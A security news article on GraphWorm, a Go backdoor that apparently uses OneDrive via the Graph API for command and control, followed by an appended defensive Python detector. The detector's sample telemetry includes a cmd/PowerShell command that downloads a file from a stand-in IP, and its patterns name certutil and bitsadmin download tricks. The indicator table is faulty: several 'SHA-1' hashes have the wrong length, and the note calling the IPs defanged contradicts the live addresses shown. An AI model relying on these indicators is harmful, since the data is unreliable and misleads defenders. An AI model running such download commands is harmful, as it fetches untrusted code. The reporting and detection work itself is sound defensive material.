Industry News & Leadership, May 20, 2026

GraphWorm Malware Uses Microsoft OneDrive as Command-and-Control Infrastructure

Cyber Security News, archived May 20, 2026


By Tushar Subhra Dutta, May 20, 2026

A well-known China-aligned threat group has quietly evolved its attack methods, and its latest toolset reveals just how far it is willing to go to stay hidden. A backdoor called GraphWorm has surfaced as part of this group’s growing arsenal, and what makes it stand out is the way it uses Microsoft OneDrive as its command-and-control channel. Instead of communicating with suspicious servers, it hides its activity inside one of the world’s most trusted cloud platforms.

The threat group behind GraphWorm is tracked as Webworm, a China-aligned operation that has been active since at least 2017 and has steadily expanded its reach. Initially focused on organizations across Asia, the group has since shifted its attention toward European targets, including government bodies in Belgium, Italy, Serbia, and Poland. It has also targeted a university in South Africa, showing that its scope continues to widen.

WeLiveSecurity said in a report shared with Cyber Security News that it identified the malware and published its findings on the group’s updated techniques.

[Figure: Forked WordPress repository (Source – Welivesecurity)]

The researchers noted that Webworm had previously relied on well-known backdoors like McRat and Trochilus, but has now moved away from those tools in favor of stealthier, custom-built options. GraphWorm is one of two new backdoors added to the group’s toolkit, alongside a Discord-based backdoor called Choreerp. GraphWorm, also referred to internally as OverOneDrive, is written in Go and uses Microsoft’s Graph API to communicate exclusively through OneDrive.

GraphWorm Malware Uses Microsoft OneDrive

This approach makes its traffic look like ordinary cloud activity, which helps it slip past many security tools. A separate folder is created in OneDrive for each victim, and three subfolders handle different tasks: storing files, receiving job instructions, and sending back results from commands run on the infected machine.

[Figure: History of nuclei and dirsearch (Source – Welivesecurity)]

The group’s initial access techniques also offer a window into how victims first get compromised. Webworm operators were found using open-source tools like Nuclei, a vulnerability scanner, and dirsearch, a web path scanner, against targets in Spain, Hungary, Belgium, Nigeria, Czechia, and Serbia. A script exploiting a known post-authentication remote code execution flaw in SquirrelMail was also found in use, suggesting the group is actively hunting for exposed web applications as entry points.

GraphWorm sets itself apart by routing all communications through a legitimate Microsoft OneDrive instance rather than a dedicated server. Upon first execution, the backdoor generates a unique victim identifier by combining network adapter details, processor information, and a device serial number. It then creates or renames a OneDrive folder using this ID, ensuring each compromised machine has its own isolated workspace in the cloud.

Commands supported by the backdoor include uploading and downloading files, executing shell commands through cmd.exe, and adjusting sleep intervals. Results from executed commands are written to a file named beaconshelloutput.txt and then uploaded back to OneDrive using Microsoft’s createUploadSession API endpoint. Since the backdoor works entirely within a cloud environment, it can handle large file uploads without raising typical red flags.

Webworm’s Expanding Proxy Infrastructure

Beyond the two new backdoors, Webworm has built an extensive proxy network using a combination of open-source and custom tools. These include Wormsrp, a custom fork of the fast reverse proxy tool frp; ChainWorm, which chains multiple proxy hops together; SmuxProxy, based on the port-forwarding tool iox; and WormSocket, which routes traffic through websocket connections. Each of these tools adds another layer between the attacker and their victim, making it harder to trace activity back to its source.

The group also used a compromised Amazon S3 bucket at wamanharipethe.s3.ap-south-1.amazonaws.com to store and retrieve configuration files for some of these proxy tools. Files found in the bucket included virtual machine snapshots containing configuration data from a government entity in Italy and documents exfiltrated from a government body in Spain.

Security teams are advised to monitor for unusual outbound connections to cloud storage services, audit scheduled tasks and registry run keys for unauthorized entries, and watch for processes using cmd.exe or powershell.exe to download files from external sources.

Indicators of Compromise (IoCs)

Type | Indicator | Description
SHA-1 Hash | 50433336707381429707F59C3CBE8D497D98 | SearchApp.exe — Win/Agent.KBuf
SHA-1 Hash | 1DF40A4A31B30B62EC33DC6FECC2C4408302ADC7 | ssh.exe — Win/Hack Tool/Proxy.WQ
SHA-1 Hash | 7DCFE9EE25841DFD58D3D6871BF867FE32141DFB | svc.exe — MSIL/Hack Tool/Proxy.WQ
SHA-1 Hash | 7F1970D620216C5FFF4E14A6CCC13FCCC267217C2 | OverOneDrivev0316.exe — Win/Agent.78CV.M
SHA-1 Hash | 48159A7FC2E688386864BEA59FD40DFFC4B24D6 | MessengerClient.exe — MSIL/Hack Tool/Proxy.WQ
SHA-1 Hash | A3C077BDF8898E612CCD65BC82E7960834ADB2A9 | dsocks.exe — Win/RiskWare/iox
Domain/URL | wamanharipethe.s3.ap-south-1.amazonaws.com | Compromised S3 bucket used for config and data exfiltration
IP Address | 45.77.13.67 | Vultr Holdings — Wormsrp web server
IP Address | 64.176.85.158 | The Constant Company — Wormsrp web server
IP Address | 104.243.23.43 | Networksoc — SmuxProxy server
IP Address | 108.61.200.151 | Vultr Holdings — Wormsrp proxy
IP Address | 144.168.60.233 | Networksoc — Reverse proxy/Edison service

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
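The monitoring advice above (unusual outbound connections to cloud storage services, and cmd.exe or powershell.exe downloading files from external sources) and the earlier description of GraphWorm polling OneDrive through the Graph API with an adjustable sleep interval both translate directly into detection logic. The Python below is an added example written for this archive; it is not code from Cyber Security News or WeLiveSecurity. The telemetry it scans, the process allowlist, the host names, the example paths and the thresholds are all constructed assumptions, not indicators from the report.

```python
"""Toy detector for the GraphWorm-style behaviour described in the article.

Input is constructed Sysmon-like telemetry (one JSON object per line), not
real logs. Three defensive checks:
  1. Graph API / OneDrive traffic from a process that is not a known
     Microsoft 365 client ("unusual outbound connections to cloud storage").
  2. One process polling a Graph host on a fixed cadence, which is how a
     backdoor with a configurable sleep interval looks on the wire.
  3. cmd.exe / powershell.exe fetching a file from a URL.
Allowlist, hosts, process names and thresholds are assumptions for this example.
"""
import json
import re
import statistics
from collections import defaultdict

# Assumed allowlist: processes expected to reach Graph/OneDrive on a managed workstation.
GRAPH_ALLOWED_IMAGES = {
    "onedrive.exe", "outlook.exe", "teams.exe", "excel.exe", "winword.exe",
    "msedge.exe", "chrome.exe", "firefox.exe",
}
GRAPH_HOSTS = {"graph.microsoft.com", "api.onedrive.com"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Command-line fragments that indicate a shell is downloading from a URL.
DOWNLOAD_PATTERNS = [
    re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring", re.I),
    re.compile(r"certutil.*-urlcache", re.I),
    re.compile(r"bitsadmin.*/transfer", re.I),
    re.compile(r"\bcurl(\.exe)?\b.*https?://", re.I),
]

# Constructed sample telemetry (not real logs); ts is epoch seconds.
SAMPLE_LOG = r"""
{"event":"network","ts":1000,"image":"C:\\Users\\alice\\AppData\\Local\\Temp\\upd.exe","dest_host":"graph.microsoft.com","dest_port":443}
{"event":"network","ts":1300,"image":"C:\\Users\\alice\\AppData\\Local\\Temp\\upd.exe","dest_host":"graph.microsoft.com","dest_port":443}
{"event":"network","ts":1598,"image":"C:\\Users\\alice\\AppData\\Local\\Temp\\upd.exe","dest_host":"graph.microsoft.com","dest_port":443}
{"event":"network","ts":1901,"image":"C:\\Users\\alice\\AppData\\Local\\Temp\\upd.exe","dest_host":"graph.microsoft.com","dest_port":443}
{"event":"network","ts":1010,"image":"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe","dest_host":"graph.microsoft.com","dest_port":443}
{"event":"network","ts":1020,"image":"C:\\Program Files\\Microsoft\\Edge\\msedge.exe","dest_host":"login.microsoftonline.com","dest_port":443}
{"event":"process","ts":1050,"image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c powershell -NoProfile -Command \"Invoke-WebRequest http://203.0.113.5/update.bin -OutFile C:\\Users\\Public\\update.bin\""}
{"event":"process","ts":1060,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -NoProfile Get-ChildItem C:\\Users\\alice"}
"""


def parse_log(text):
    """Parse one JSON event per line; blank lines are skipped."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_network(ev):
    """Check 1: Graph/OneDrive traffic from a process outside the allowlist."""
    if ev["event"] != "network":
        return None
    host = ev["dest_host"].lower()
    if host not in GRAPH_HOSTS or basename(ev["image"]) in GRAPH_ALLOWED_IMAGES:
        return None
    return {"rule": "graph_api_unexpected_process", "image": basename(ev["image"]),
            "path": ev["image"], "host": host}


def check_process(ev):
    """Check 3: cmd.exe or PowerShell used to fetch a file from a URL."""
    if ev["event"] != "process" or basename(ev["image"]) not in SHELLS:
        return None
    if not any(p.search(ev["cmdline"]) for p in DOWNLOAD_PATTERNS):
        return None
    return {"rule": "shell_download", "image": basename(ev["image"]), "cmdline": ev["cmdline"]}


def check_beaconing(events, min_intervals=3, max_cv=0.1):
    """Check 2: regular polling of a Graph host by one process. Alerts when the
    coefficient of variation of the gaps between connections is at most max_cv."""
    series = defaultdict(list)
    for ev in events:
        if ev["event"] == "network" and ev["dest_host"].lower() in GRAPH_HOSTS:
            series[(basename(ev["image"]), ev["dest_host"].lower())].append(ev["ts"])
    alerts = []
    for (image, host), stamps in series.items():
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if len(gaps) < min_intervals:
            continue
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            alerts.append({"rule": "graph_api_regular_beacon", "image": image, "host": host,
                           "interval_s": round(mean), "cv": round(cv, 3)})
    return alerts


def scan(events):
    """Run all checks; per-event alerts are de-duplicated on (rule, image, host or cmdline)."""
    alerts, seen = [], set()
    for ev in events:
        for alert in (check_network(ev), check_process(ev)):
            if alert is None:
                continue
            key = (alert["rule"], alert["image"], alert.get("host", alert.get("cmdline")))
            if key not in seen:
                seen.add(key)
                alerts.append(alert)
    alerts.extend(check_beaconing(events))
    return alerts


if __name__ == "__main__":
    for alert in scan(parse_log(SAMPLE_LOG)):
        print(json.dumps(alert))
```

Run as a script it prints three alerts for the constructed sample: the unexpected process reaching graph.microsoft.com, the same process polling it at a roughly 300-second cadence, and cmd.exe launching a download. In practice the events would come from Sysmon Event ID 3 (network connection) and Event ID 1 (process creation) records; the beacon check keys on the process name and destination only, so a backdoor named to blend in still shows up through its cadence, and the allowlist and thresholds need tuning to each environment.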